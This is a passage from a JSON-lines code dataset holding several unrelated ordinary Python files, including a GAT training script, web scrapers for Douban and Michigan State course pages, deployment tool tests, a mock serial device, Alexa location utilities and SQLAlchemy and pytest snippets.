Variable(torch.FloatTensor(x_train[0])).to(args.device)\n adj = Variable(torch.FloatTensor(np.ones([features.shape[0],features.shape[0]]))).to(args.device)\n labels = Variable(torch.LongTensor(y_train[0])).to(args.device)\n\n\n # Model and optimizer\n if args.sparse:\n model = SpGAT(nfeat=features.shape[1],\n nhid=args.hidden,\n nclass=int(y_train.max()) + 1,\n dropout=args.dropout,\n nheads=args.nb_heads,\n alpha=args.alpha)\n else:\n model = GConvAT(nfeat=features.shape[1],\n nhid=args.hidden,\n nclass=int(y_train.max()) + 1,\n dropout=args.dropout,\n nheads=args.nb_heads,\n alpha=args.alpha)\n optimizer = optim.Adam(model.parameters(),\n lr=args.lr,\n weight_decay=args.weight_decay)\n\n if args.cuda:\n model.cuda()\n\n # Train model\n t_total = time.time()\n save_dir = time.strftime('GConvAT(%b %d %H.%M.%S %Y)')\n os.mkdir(save_dir)\n with open('{}/settings.txt'.format(save_dir), 'w') as f: f.write(args.__str__())\n log_file = sys.stdout if args.no_log else open('{}/logs.txt'.format(save_dir), 'w')\n loss_values = []\n bad_counter = 0\n best = args.epochs + 1\n best_epoch = 0\n for epoch in range(args.epochs):\n loss_values.append(train(epoch))\n\n torch.save(model.state_dict(), '{}/{}.pkl'.format(save_dir, epoch))\n if loss_values[-1] < best:\n best = loss_values[-1]\n best_epoch = epoch\n bad_counter = 0\n print('save best to:', save_dir, file=log_file)\n else:\n bad_counter += 1\n\n if bad_counter == args.patience:\n break\n\n files = glob.glob('{}/*.pkl'.format(save_dir))\n for file in files:\n epoch_nb = int(os.path.split(file)[-1].split('.')[0])\n if epoch_nb < best_epoch:\n os.remove(file)\n\n files = glob.glob('{}/*.pkl'.format(save_dir))\n for file in files:\n epoch_nb = int(os.path.split(file)[-1].split('.')[0])\n if epoch_nb > best_epoch:\n os.remove(file)\n\n print(\"Optimization Finished!\", file=log_file, flush=True)\n print(\"Total time elapsed: {:.4f}s\".format(time.time() - t_total))\n\n # Restore best model\n print('Loading {}th epoch'.format(best_epoch))\n model.load_state_dict(torch.load('{}/{}.pkl'.format(save_dir, best_epoch)))\n\n # Testing\n compute_test()\n","repo_name":"subercui/pyGConvAT","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":8264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25929847003","text":"# encoding: utf-8\n\nimport requests\nfrom lxml import etree\n\n\n# 1.将目标网站上的页面抓取下来\nheaders = {\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36\",\n \"Referer\": \"https://movie.douban.com/\"\n}\nurl = \"https://movie.douban.com/cinema/nowplaying/hangzhou/\"\nresp = requests.get(url=url, headers=headers)\ntext = resp.text\n# print(text)\n# with open(\"douban_movie.html\", \"w\", encoding=\"utf-8\") as f:\n# f.write(resp.content.decode(\"utf-8\"))\n# resp.text 返回的是经过解码的字符串 是str(unicode)类型\n# resp.content 返回的是一个原生的字符串,就是从网页上抓取下来的,没有经过处理的字符串,bytes类型\n\n# 2.将抓取下来的数据根据一定的规则进行提取\nmovies = list()\nhtml = etree.HTML(text)\n# //ul[@class=\"lists\"]\nul = html.xpath(\"//ul[@class='lists']\")[0]\n# print(etree.tostring(ul, encoding=\"utf-8\").decode(\"utf-8\"))\n# ./li\nlis = ul.xpath(\"./li\")\nfor li in lis:\n # print(etree.tostring(li, encoding=\"utf-8\").decode(\"utf-8\"))\n # @data-title\n title = li.xpath(\"@data-title\")[0]\n # @data-score\n score = li.xpath(\"@data-score\")[0]\n # @data-duration\n duration = li.xpath(\"@data-duration\")[0]\n # @data-region\n region = li.xpath(\"@data-region\")[0]\n # @data-director\n director = li.xpath(\"@data-director\")[0]\n # @data-actors\n actors = li.xpath(\"@data-actors\")[0]\n # .//img/@src\n thumbnail = li.xpath(\".//img/@src\")[0]\n # print(thumbnail)\n movie = {\n \"title\": title,\n \"score\": score,\n \"duration\": duration,\n \"region\": region,\n \"director\": director,\n \"actors\": actors,\n \"thumbnail\": thumbnail\n }\n movies.append(movie)\n\nprint(movies)\n\n","repo_name":"kcshan/python_spider_study","sub_path":"17.douban_spider.py","file_name":"17.douban_spider.py","file_ext":"py","file_size_in_byte":1797,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"37296261869","text":"import io\nimport itertools\nimport os\nimport subprocess\nfrom tarfile import TarFile, TarInfo\n\nimport pytest\n\n\n@pytest.fixture\ndef tarballs():\n def tarballs_generator():\n count = 0\n while True:\n count += 1\n content = f\"foo #{count}\".encode()\n tar_bytes = io.BytesIO()\n with TarFile(fileobj=tar_bytes, mode=\"w\") as tarfile:\n tarinfo = TarInfo(\"foo.txt\")\n tarinfo.size = len(content)\n tarfile.addfile(tarinfo, io.BytesIO(content))\n yield tar_bytes.getvalue()\n\n return tarballs_generator()\n\n\n@pytest.fixture\ndef tarball(tarballs):\n return next(tarballs)\n\n\ndef test_implicit_deploy_from_stdin(tmp_path, tarball):\n r = subprocess.run(\n f\"tarball-deploy --workdir={tmp_path}\", shell=True, input=tarball\n )\n assert r.returncode == 0\n with open(tmp_path / \"current\" / \"foo.txt\") as f:\n assert f.read() == \"foo #1\"\n\n\ndef test_explicit_deploy_from_stdin(tmp_path, tarball):\n r = subprocess.run(\n f\"tarball-deploy --workdir={tmp_path} --from=-\", shell=True, input=tarball\n )\n assert r.returncode == 0\n with open(tmp_path / \"current\" / \"foo.txt\") as f:\n assert f.read() == \"foo #1\"\n\n\ndef test_deploy_from_file(tmp_path, tarball):\n with open(tmp_path / \"release.tar\", \"wb\") as f:\n f.write(tarball)\n r = subprocess.run(\n f\"tarball-deploy --workdir={tmp_path} --from={tmp_path}/release.tar\",\n shell=True,\n input=tarball,\n )\n assert r.returncode == 0\n with open(tmp_path / \"current\" / \"foo.txt\") as f:\n assert f.read() == \"foo #1\"\n\n\ndef test_deploy_hooks(tmp_path, tarball):\n os.mkdir(tmp_path / \"hooks\")\n for hook_name in [\"pre-deploy\", \"post-deploy\"]:\n with open(tmp_path / \"hooks\" / hook_name, \"w\") as f:\n f.write(f\"#!/bin/sh\\necho {hook_name} hook called.\")\n os.chmod(tmp_path / \"hooks\" / hook_name, 0o755)\n r = subprocess.run(\n f\"tarball-deploy --workdir={tmp_path}\",\n shell=True,\n input=tarball,\n capture_output=True,\n )\n # assert r.returncode == 0\n assert r.stdout == (b\"pre-deploy hook called.\\npost-deploy hook called.\\n\")\n\n\ndef test_repeated_deploys(tmp_path, tarballs):\n for tarball in itertools.islice(tarballs, 3):\n r = subprocess.run(\n f\"tarball-deploy --workdir={tmp_path} --from=-\", shell=True, input=tarball\n )\n assert r.returncode == 0\n with open(tmp_path / \"current\" / \"foo.txt\") as f:\n assert f.read() == \"foo #3\"\n with open(tmp_path / \"previous\" / \"foo.txt\") as f:\n assert f.read() == \"foo #2\"\n assert len(os.listdir(tmp_path / \"releases\")) == 2\n\n\ndef test_rollback(tmp_path, tarballs):\n for tarball in itertools.islice(tarballs, 2):\n subprocess.run(\n f\"tarball-deploy --workdir={tmp_path} --from=-\", shell=True, input=tarball\n )\n r = subprocess.run(f\"tarball-deploy --workdir={tmp_path} --rollback\", shell=True)\n assert r.returncode == 0\n with open(tmp_path / \"current\" / \"foo.txt\") as f:\n assert f.read() == \"foo #1\"\n","repo_name":"psliwka/tarball-deploy","sub_path":"tests/test_functional.py","file_name":"test_functional.py","file_ext":"py","file_size_in_byte":3120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37298564351","text":"\"\"\"mqtt_base setup.py.\"\"\"\n\nimport setuptools\nfrom mqtt_base.const import APP_NAME, VERSION\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=APP_NAME,\n version=VERSION,\n author=\"Crowbar Z\",\n author_email=\"crowbarz@outlook.com\",\n description=\"Event driven base framework for MQTT applications\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/crowbarz/mqtt-base\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Development Status :: 4 - Beta\",\n \"Operating System :: POSIX :: Linux\",\n \"Intended Audience :: System Administrators\",\n \"License :: OSI Approved :: MIT License\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 3.9\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n \"Topic :: System :: Monitoring\",\n \"Topic :: System :: Networking :: Monitoring\",\n ],\n python_requires=\">=3.9\",\n install_requires=[\n \"python-daemon==3.0.1\",\n \"paho-mqtt==1.6.1\",\n ],\n entry_points={\n \"console_scripts\": [\n \"mqtt-base=mqtt_base.mqtt_base:main\",\n ]\n },\n)\n","repo_name":"crowbarz/mqtt-base","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"789994707","text":"__all__ = [\"MockSerial\", \"MockLST\"]\n\nimport inspect\nimport logging\nimport queue\n\nimport serial\nfrom zaber.serial import AsciiCommand\n\n\nclass MockSerial:\n \"\"\"Implements mock serial.\n\n Parameters\n ----------\n port : `str`\n baudrate : `int`\n bytesize : `int`\n parity\n stopbits\n timeout : `None` or `float`\n xonxoff : `bool`\n rtscts : `bool`\n write_timeout : `None` or `float`\n dsrdtr : `bool`\n inter_byte_timeout : `None` or `float`\n exclusive : `None`\n\n Attributes\n ----------\n log : `logging.Logger`\n name : `str`\n baudrate : `int`\n bytesize : `int`\n parity\n stopbits\n timeout : `None` or `float`\n xonxoff : `bool`\n rtscts : `bool`\n write_timeout : `None` or `float`\n dsrdts : `bool`\n inter_byte_timeout : `None` or `float`\n exclusive : `bool`\n opened : `bool`\n device : `MockLST`\n message_queue : `queue.Queue`\n \"\"\"\n\n def __init__(\n self,\n port,\n baudrate=9600,\n bytesize=serial.EIGHTBITS,\n parity=serial.PARITY_NONE,\n stopbits=serial.STOPBITS_ONE,\n timeout=None,\n xonxoff=False,\n rtscts=False,\n write_timeout=None,\n dsrdtr=False,\n inter_byte_timeout=None,\n exclusive=None,\n ):\n self.log = logging.getLogger(__name__)\n self.name = port\n self.baudrate = baudrate\n self.bytesize = bytesize\n self.parity = parity\n self.stopbits = stopbits\n self.timeout = timeout\n self.xonxoff = xonxoff\n self.rtscts = rtscts\n self.write_timeout = write_timeout\n self.dsrdtr = dsrdtr\n self.inter_byte_timeout = inter_byte_timeout\n self.exclusive = exclusive\n self.opened = False\n\n self.device = MockLST()\n self.message_queue = queue.Queue()\n\n self.log.info(\"MockSerial created\")\n\n def readline(self, size=-1):\n \"\"\"Read the line.\n\n Parameters\n ----------\n size : `int`, optional\n The size of the line.\n\n Returns\n -------\n msg : `bytes`\n The message from the queue.\n \"\"\"\n self.log.info(\"Reading from queue\")\n msg = self.message_queue.get()\n self.log.info(msg.encode())\n return msg.encode()\n\n def write(self, data):\n \"\"\"Write the data.\n\n Parameters\n ----------\n data : `bytes`\n The command message.\n \"\"\"\n self.log.info(data)\n msg = self.device.parse_message(data)\n self.log.debug(msg)\n self.message_queue.put(msg)\n self.log.info(\"Putting into queue\")\n\n def close(self):\n \"\"\"Close the serial connection.\"\"\"\n self.log.info(\"Closing serial connection\")\n\n\nclass MockLST:\n \"\"\"Implements mock LinearStage.\n\n Attributes\n ----------\n log : `logging.Logger`\n position : `int`\n status : `str`\n device_number : `int`\n\n \"\"\"\n\n def __init__(self):\n self.log = logging.getLogger(__name__)\n self.position = 0\n self.status = \"IDLE\"\n self.device_number = 1\n self.log.info(\"MockLST created\")\n\n def parse_message(self, msg):\n \"\"\"Parse and return the result of the message.\n\n Parameters\n ----------\n msg : `bytes`\n The message to parse.\n\n Returns\n -------\n reply : `bytes`\n The reply of the command parsed.\n\n Raises\n ------\n NotImplementedError\n Raised when command is not implemented.\n \"\"\"\n self.log.info(msg)\n msg = AsciiCommand(msg)\n self.log.info(msg)\n split_msg = msg.data.split(\" \")\n self.log.debug(split_msg)\n if any(char.isdigit() for char in split_msg[-1]):\n parameter = split_msg[-1]\n command = split_msg[:-1]\n else:\n parameter = None\n command = split_msg\n self.log.debug(parameter)\n if command != []:\n command_name = \"_\".join(command)\n else:\n command_name = \"\"\n self.log.debug(command_name)\n methods = inspect.getmembers(self, inspect.ismethod)\n if command_name == \"\":\n return self.do_get_status()\n else:\n for name, func in methods:\n if name == f\"do_{command_name}\":\n self.log.debug(name)\n if parameter is None:\n reply = func()\n else:\n reply = func(parameter)\n self.log.debug(reply)\n return reply\n raise NotImplementedError()\n\n def do_get_pos(self):\n \"\"\"Return the position of the device.\n\n Returns\n -------\n str\n The formatted reply\n \"\"\"\n return f\"@{self.device_number} 0 OK {self.status} -- {self.position}\"\n\n def do_get_status(self):\n \"\"\"Return the status of the device.\n\n Returns\n -------\n str\n The formatted reply.\n \"\"\"\n return f\"@{self.device_number} 0 OK {self.status} -- 0\"\n\n def do_home(self):\n \"\"\"Home the device.\n\n Returns\n -------\n str\n The formatted reply.\n \"\"\"\n return f\"@{self.device_number} 0 OK {self.status} -- 0\"\n\n def do_move_abs(self, position):\n \"\"\"Move the device using absolute position.\n\n Parameters\n ----------\n position : `int`\n\n Returns\n -------\n str\n The formatted reply\n \"\"\"\n self.position = int(position)\n return f\"@{self.device_number} 0 OK {self.status} -- 0\"\n\n def do_move_rel(self, position):\n \"\"\"Move the device using relative position.\n\n Parameters\n ----------\n position : `int`\n\n Returns\n -------\n str\n The formatted reply.\n \"\"\"\n self.position += int(position)\n return f\"@{self.device_number} 0 OK {self.status} -- 0\"\n","repo_name":"lsst-ts/ts_linearstage","sub_path":"python/lsst/ts/linearstage/mocks/mock_zaber_lst.py","file_name":"mock_zaber_lst.py","file_ext":"py","file_size_in_byte":6011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37122493091","text":"import os\nimport csv\nimport time\nimport numpy as np\nimport pandas as pd\nfrom scipy import stats\nfrom functools import partial\nfrom multiprocessing import Pool \nfrom help_functions import memory_optimize,memory_optimize2\n\ndef filter_pearson(x,y):\n return stats.pearsonr(x,y)[0]\n\ndef calculate_pearson(max_div, n):\n\n static_file = 'AMD_features_binary.csv'\n dynamic_file = 'extracted_features_all.csv'\n\n headers = []\n with open(dynamic_file, \"rt\") as f:\n reader = csv.reader(f)\n headers = next(reader)\n\n # Remove sample and variety as columns\n headers = headers[2:]\n max_headers = len(headers)/max_div\n\n if n == 1:\n columns = headers[:int(max_headers*n)]\n else:\n columns = headers[int(max_headers*(n-1)):int(max_headers*n)]\n\n df_chunk = pd.read_csv(dynamic_file, engine='c', low_memory=False, chunksize=5000, usecols=['sample', 'variety'] + columns)\n chunk_list = []\n for chunk in df_chunk:\n # Run memory optimization\n opt_chunk = memory_optimize2(chunk)\n # Append optimized chunk to chunk_list\n chunk_list.append(opt_chunk)\n\n # Concatinate the chunks into one dataframes\n df_dynamic = pd.concat(chunk_list)\n\n # load entire static dataset\n df_static = pd.read_csv(static_file, engine='c', low_memory=False)\n # Drop irrelevant data from static dataset\n df_static.drop(df_static.columns[1:4], axis=1, inplace=True)\n # Optimize since all data are binary\n df_static = memory_optimize(df_static)\n\n # Get dynamic and static columns\n dynamic_features = list(df_dynamic.columns)\n static_features = list(df_static.columns)\n\n # Merge static and dynamic datasets\n df_static_part = pd.DataFrame(index=df_dynamic.index, columns=static_features, dtype=np.uint16)\n for index, row in df_static_part.iterrows():\n df_static_part.loc[index] = df_static.loc[index[1]]\n df_concat = pd.concat([df_dynamic, df_static_part], axis=1)\n\n # Clear RAM from unnecessary datasets\n del [df_static, df_dynamic]\n\n # Leave 1 core free from calculation\n max_workers = os.cpu_count() - 1\n pool = Pool(processes = max_workers)\n\n # result dataframe\n df_correlations = pd.DataFrame(index=dynamic_features, columns=static_features)\n\n # Get each dynamic feature values in to lists\n dynamic_feature_values = []\n for column in dynamic_features:\n dynamic_feature_values.append(list(df_concat[column])) \n\n print(f'INFO: Starting calculations.')\n start = time.time()\n # Run pearson correlation\n for static_feature in static_features:\n static_feature_values = list(df_concat[static_feature])\n results = pool.map(partial(filter_pearson, y=static_feature_values), dynamic_feature_values)\n df_correlations.loc[dynamic_features, static_feature] = results\n end = time.time()\n print(f'INFO: Calculations were completed in: {(end - start)/60} minutes.')\n # Write results to csv\n df_correlations.to_csv(f'Feature_Correlations{n}_{max_div}.csv', sep=',', encoding='utf-8')\n","repo_name":"vikre869/correlation_analysis","sub_path":"pearson_corr_analysis.py","file_name":"pearson_corr_analysis.py","file_ext":"py","file_size_in_byte":3043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29480415598","text":"import scrapy\nfrom UniversityScraper.items import UniversityItem\nimport logging, re, traceback\nimport requests\nfrom lxml import html\n\n\n\nclass MsuSpider(scrapy.Spider):\n name = 'msu'\n #allowed_domains = ['www.reg.msu.edu']\n start_urls = ['https://reg.msu.edu/AcademicPrograms/Programs.aspx?PType=UN']\n\n def parse(self, response):\n Acadmic_programs_urls=response.xpath('//*[@id=\"divAPMenu\"]/div/a/@href').extract()\n\n logging.warn(\"msu; Scraping Started...; url= %s\", response.url)\n Acadmic_programs_urls=Acadmic_programs_urls[1:9]\n print(len(Acadmic_programs_urls))\n for Acadmic_programs_url in Acadmic_programs_urls:\n Acadmic_programs_url='https://reg.msu.edu/AcademicPrograms/'+Acadmic_programs_url\n yield scrapy.Request(Acadmic_programs_url,callback=self.course_link)\n\n\n def course_link(self,response):\n course_links=response.xpath('//*[@id=\"MainContent_divData\"]/div/a/@href').extract()\n logging.warn(\"msu; Scraping Courses Started....; url= %s\", response.url)\n ielts_url=fee_url=''\n ielts_da = self._get_ielts_pte_tofel(ielts_url)\n fee=self._get_fee(fee_url)\n for course_url in course_links:\n course_url='https://reg.msu.edu/AcademicPrograms/'+course_url\n yield scrapy.Request(course_url,callback=self.course_info,meta={'eng_data':ielts_da,'fee':fee})\n\n def course_info(self,response):\n try:\n item = UniversityItem()\n\n # 1 CourseName\n program=response.xpath('//*[@id=\"MainContent_tdProgram\"]/text()').get()\n award=response.xpath('//*[@id=\"MainContent_tdAward\"]/text()').get()\n comma=','\n course_name = award+comma+program\n item['course_name'] = course_name\n\n #degree_level\n degree_level=response.xpath('//*[@id=\"MainContent_tdLevel\"]/text()').get()\n item['degree_level']=degree_level\n\n #course_website\n course_website=response.url\n item['course_website']=course_website\n\n #fee data\n fee=response.request.meta['fee']\n\n #domestic_fee\n domestic_fee=fee[0]\n domestic_fee=re.findall(\"\\d+\", domestic_fee)\n item['domestic_fee']=domestic_fee\n\n #international fee\n international_fee=fee[1]\n international_fee=re.findall(\"\\d+\\,+\\d+\\d+\\d\", international_fee)\n item['international_fee'] =international_fee\n\n #fee term\n fee_term='year'\n item['fee_term']=fee_term\n\n #Domestic only\n if domestic_fee:\n domestic_only=True\n item['domestic_only']=domestic_only\n\n #fee_year\n fee_year='2021'\n item['fee_year']=fee_year\n\n\n #eng_data\n eng_req_score = response.request.meta['eng_data']\n\n\n # item['ielts_reading']=eng_req_score\n ielts_overall=eng_req_score[0]\n ielts_overall=re.findall(\"\\d+\\.+\\d\", ielts_overall)\n ielts_overall=' '.join(map(str, ielts_overall))\n item['ielts_overall']=ielts_overall\n\n #pte\n pte_data=eng_req_score[1]\n pte_data=re.findall(\"\\d+\", pte_data)\n pte_overall=pte_data[0]\n pte_reading=pte_data[1]\n pte_speaking=pte_data[1]\n pte_writing =pte_data[1]\n pte_listening=pte_data[1]\n\n item['pte_overall']=pte_overall\n item['pte_writing'] = pte_writing\n item['pte_speaking'] = pte_speaking\n item['pte_reading'] = pte_reading\n item['pte_listening'] = pte_listening\n\n #toeft\n toefl_data=eng_req_score[2]\n toefl_data=re.findall(\"\\d+\", toefl_data)\n toefl_overall=toefl_data[0]\n toefl_reading=toefl_data[1]\n toefl_writing =toefl_data[1]\n toefl_speaking =toefl_data[1]\n toefl_listening =toefl_data[1]\n\n item[\"toefl_listening\"] = toefl_listening\n item[\"toefl_writing\"] = toefl_writing\n item[\"toefl_reading\"] = toefl_reading\n item[\"toefl_speaking\"] = toefl_speaking\n item[\"toefl_overall\"] = toefl_overall\n\n #course_description\n course_description=response.xpath('//*[@id=\"MainContent_divDesc\"]/div/div[2]/p/text()').extract()\n item['course_description']=course_description\n\n #course structure\n course_structure=response.xpath('//*[@id=\"MainContent_divDesc\"]/div/div[2]/ol')\n\n if course_structure==None:\n course_structure=response.xpath('//*[@id=\"MainContent_divDesc\"]/div/div[2]/table')\n\n\n item['course_structure']=course_structure\n\n\n\n\n\n\n yield item\n\n\n\n\n\n except Exception as e:\n logging.error(\"msu; msg=Crawling Failed > %s;url= %s\", str(e), response.url)\n logging.error(\"msu; msg=Crawling Failed;url= %s;Error=%s\", response.url, traceback.format_exc())\n\n\n def _get_ielts_pte_tofel(self,ipt_url):\n page1 = requests.get('https://admissions.msu.edu/apply/international/before-you-apply/english-language-proficiency.aspx')\n response = html.fromstring(page1.content)\n english_req=[]\n ielts=response.xpath('//*[@id=\"msuDetail\"]/p[5]/text()')\n pte=response.xpath('//*[@id=\"msuDetail\"]/p[21]/text()')\n toefl=response.xpath('//*[@id=\"msuDetail\"]/ul[3]/li/text()')\n english_req.append(ielts)\n english_req.append(pte)\n english_req.append(toefl)\n english_req = list(map(''.join, english_req))\n return english_req\n\n def _get_fee(self,fee_url):\n page2=requests.get('https://admissions.msu.edu/cost-aid/tuition-fees/default.aspx')\n response=html.fromstring(page2.content)\n fee=[]\n domestic_fee=response.xpath('//*[@id=\"msuDetail\"]/p[1]/strong/text()')\n international_fee=response.xpath('//*[@id=\"msuDetail\"]/p[4]/strong/text()')\n fee.append(domestic_fee)\n fee.append(international_fee)\n fee=list(map(''.join, fee))\n return fee\n\n","repo_name":"dipusah/Scrapy","sub_path":"msu (1).py","file_name":"msu (1).py","file_ext":"py","file_size_in_byte":6154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73267118826","text":"import requests\nimport logging\nfrom mycity.intents import intent_constants\nfrom mycity.intents.speech_constants.location_speech_constants import \\\n GENERIC_GEOLOCATION_PERMISSON_SPEECH, GENERIC_DEVICE_PERMISSON_SPEECH\nimport mycity.utilities.gis_utils as gis_utils\nimport mycity.mycity_response_data_model as mycity_response_data_model\nimport usaddress\n\n\"\"\" Methods for working with location based data \"\"\"\nlogger = logging.getLogger(__name__)\n\n\ndef get_address_from_user_device(mycity_request):\n \"\"\"\n checks Amazon api for device address permissions. \n If given, the address, if present, will be stored \n in the session attributes\n :param mycity_request: MyCityRequestDataModel\n :param mycity_response: MyCityResponseDataModel\n :return : MyCityRequestModel object and boolean indicating if we have\n device address permissions\n \"\"\"\n logger.debug('MyCityRequestDataModel received:' + mycity_request.\n get_logger_string())\n\n base_url = \"https://api.amazonalexa.com/v1/devices/{}\" \\\n \"/settings/address\".format(mycity_request.device_id)\n head_info = {'Accept': 'application/json',\n 'Authorization': 'Bearer {}'.format(mycity_request.\n api_access_token)}\n response_object = requests.get(base_url, headers=head_info)\n\n logger.debug(\"response object:{}\".format(response_object))\n try:\n res = response_object.json()\n if response_object.status_code == 200 and res['addressLine1'] is not None:\n address = res['addressLine1']\n state = res['stateOrRegion']\n city = res['city']\n current_address = \" \".join([address, city, state])\n mycity_request.session_attributes[\n intent_constants.CURRENT_ADDRESS_KEY] = current_address\n except Exception:\n # If we fail to parse a response, just return like we don't have\n # sufficient permissions\n return mycity_request, False\n return mycity_request, response_object.status_code == 200\n\n\ndef request_geolocation_permission_response():\n \"\"\"\n Builds a response object for requesting geolocation permissions. The\n returned object's speech can be modified if you want to add more information.\n\n :return MyCityResponseDataModel: MyCityResponseDataModel with required fields\n to request geolocation access\n \"\"\"\n response = mycity_response_data_model.MyCityResponseDataModel()\n response.output_speech = GENERIC_GEOLOCATION_PERMISSON_SPEECH\n response.card_type = \"AskForPermissionsConsent\"\n response.card_permissions = [\"alexa::devices:all:geolocation:read\"]\n response.should_end_session = True\n return response\n\n\ndef request_device_address_permission_response():\n \"\"\"\n Builds a response object for requesting geolocation permissions. The\n returned object's speech can be modified if you want to add more information.\n\n :return MyCityResponseDataModel: MyCityResponseDataModel with required fields\n to request geolocation access\n \"\"\"\n response = mycity_response_data_model.MyCityResponseDataModel()\n response.output_speech = GENERIC_DEVICE_PERMISSON_SPEECH\n response.card_type = \"AskForPermissionsConsent\"\n response.card_permissions = [\"read::alexa:device:all:address\"]\n response.should_end_session = True\n return response\n\n\ndef convert_mycity_coordinates_to_arcgis(mycity_request) -> dict:\n \"\"\"\n Gets coordinates from a MyCityRequestDataModel and converts them to dictionary\n required by GIS utilities\n\n :param mycity_request: MyCityRequstDataModel containing geolocation coordinates\n to convert\n :return dictionary: x, y coordinates of device location\n \"\"\"\n gis_coordinates = {\n 'x': 0,\n 'y': 0\n }\n \n if mycity_request.geolocation_coordinates:\n gis_coordinates['y'] = mycity_request.geolocation_coordinates[\"latitudeInDegrees\"]\n gis_coordinates['x'] = mycity_request.geolocation_coordinates[\"longitudeInDegrees\"]\n\n return gis_coordinates\n\n\ndef is_in_city(mycity_request, city):\n \"\"\"\n Reverse geo-locate the session's coordinates to determine if the device is\n in Boston\n :param city: City to check reverse geo-location to\n :param mycity_request: MyCityRequestDataModel\n :return: True or False\n \"\"\"\n logger.debug('MyCityRequestDataModel received:' +\n mycity_request.get_logger_string())\n\n if mycity_request.geolocation_coordinates:\n return are_coordinates_in_city(\n mycity_request.geolocation_coordinates,\n [city])\n\n return True\n\n\ndef are_coordinates_in_city(coordinates, cities):\n \"\"\"\n Checks if the provided coordinates are in any\n of the cities provided\n :param coordinates: Dictionary of coordinates\n :param cities: Array of possible cities to check against\n :return: True if coordinates are in one of the cities. False if not.\n \"\"\"\n if 'latitudeInDegrees' in coordinates:\n coordinates['y'] = coordinates[\"latitudeInDegrees\"]\n coordinates['x'] = coordinates[\"longitudeInDegrees\"]\n\n lat = coordinates['y']\n long = coordinates['x']\n\n location = gis_utils.reverse_geocode_addr([long, lat])\n if location['address']['City'] in cities and \\\n location['address']['Region'] == 'Massachusetts':\n return True\n\n return False\n\n\ndef is_address_in_city(address):\n \"\"\"\n Check if the provided address is in Boston\n :param address: the adress to check\n :return: boolean\n \"\"\"\n\n # If we don't have any detail about city or zipcode\n # we default to Boston for the geocode search\n parsed_address, _ = usaddress.tag(address)\n if \"PlaceName\" not in parsed_address and \"ZipCode\" not in parsed_address:\n address = \" \".join([address, \"Boston\"])\n\n city = 'Boston Metro Area'\n return gis_utils.geocode_addr(address, city)\n\n\ndef is_location_in_city(address, coordinates):\n \"\"\"\n Determines if the provided address or coordinates\n are located in Boston. If both are provided,\n address takes priority\n :param address: String of address to check. Can be None.\n :param coordinates: Dictionary of coordinates to check. Can be None.\n :return: True if location is in Boston. False if not.\n \"\"\"\n if address:\n return is_address_in_city(address)\n if coordinates:\n return are_coordinates_in_city(coordinates, gis_utils.NEIGHBORHOODS)\n\n return True\n","repo_name":"codeforboston/voiceapp311","sub_path":"mycity/mycity/utilities/location_services_utils.py","file_name":"location_services_utils.py","file_ext":"py","file_size_in_byte":6464,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"37"} +{"seq_id":"27341798350","text":"#!/usr/bin/python3\n\"\"\"Write a script that lists all State objects from the\n database hbtn_0e_6_usa using SQLAlchemy ORM\n\n Note: add an object to the database\n \"\"\"\n\nimport sys\nfrom sqlalchemy.orm import sessionmaker, relationship\nfrom sqlalchemy import (create_engine)\nfrom relationship_city import City\nfrom relationship_state import Base, State\n\n\nif __name__ == \"__main__\":\n username = sys.argv[1]\n pwd = sys.argv[2]\n db_name = sys.argv[3]\n engine = create_engine('mysql+mysqldb://{}:{}@localhost/{}'.format(\n sys.argv[1], sys.argv[2],\n sys.argv[3]), pool_pre_ping=True)\n Base.metadata.create_all(engine)\n Session = sessionmaker(bind=engine)\n session = Session()\n for c in session.query(City).join(State).order_by(City.id).all():\n print(\"{}: {} -> {}\".format(c.id, c.name, c.state.name))\n","repo_name":"Olakunle64/alx-higher_level_programming","sub_path":"0x0F-python-object_relational_mapping/102-relationship_cities_states_list.py","file_name":"102-relationship_cities_states_list.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"765787397","text":"\"\"\"\nTests for the module firecrown.likelihood.gauss_family.statistic.statistic.\n\"\"\"\nfrom typing import List\nimport numpy as np\nimport pytest\nimport sacc\n\nimport firecrown.likelihood.gauss_family.statistic.statistic as stat\n\n\nVECTOR_CLASSES = (stat.TheoryVector, stat.DataVector)\n\n\ndef test_vector_create():\n vals = np.random.random_sample((10,))\n assert isinstance(vals, np.ndarray)\n assert vals.dtype == np.float64\n assert vals.shape == (10,)\n for cls in VECTOR_CLASSES:\n result = cls.create(vals) # type: ignore\n assert isinstance(result, cls)\n assert result.shape == (10,)\n assert np.array_equal(vals, result)\n\n\ndef test_vector_from_list():\n vals = [1.5, 2.5, -3.0, 10.0]\n assert isinstance(vals, list)\n assert len(vals) == 4\n for cls in VECTOR_CLASSES:\n result = cls.from_list(vals) # type: ignore\n assert isinstance(result, cls)\n assert result.shape == (4,)\n for i, val in enumerate(vals):\n assert result[i] == val\n\n\ndef test_vector_slicing():\n for cls in VECTOR_CLASSES:\n vec = cls.create(np.random.random_sample((12,))) # type: ignore\n assert isinstance(vec, cls)\n middle_part = vec[3:6]\n assert middle_part.shape == 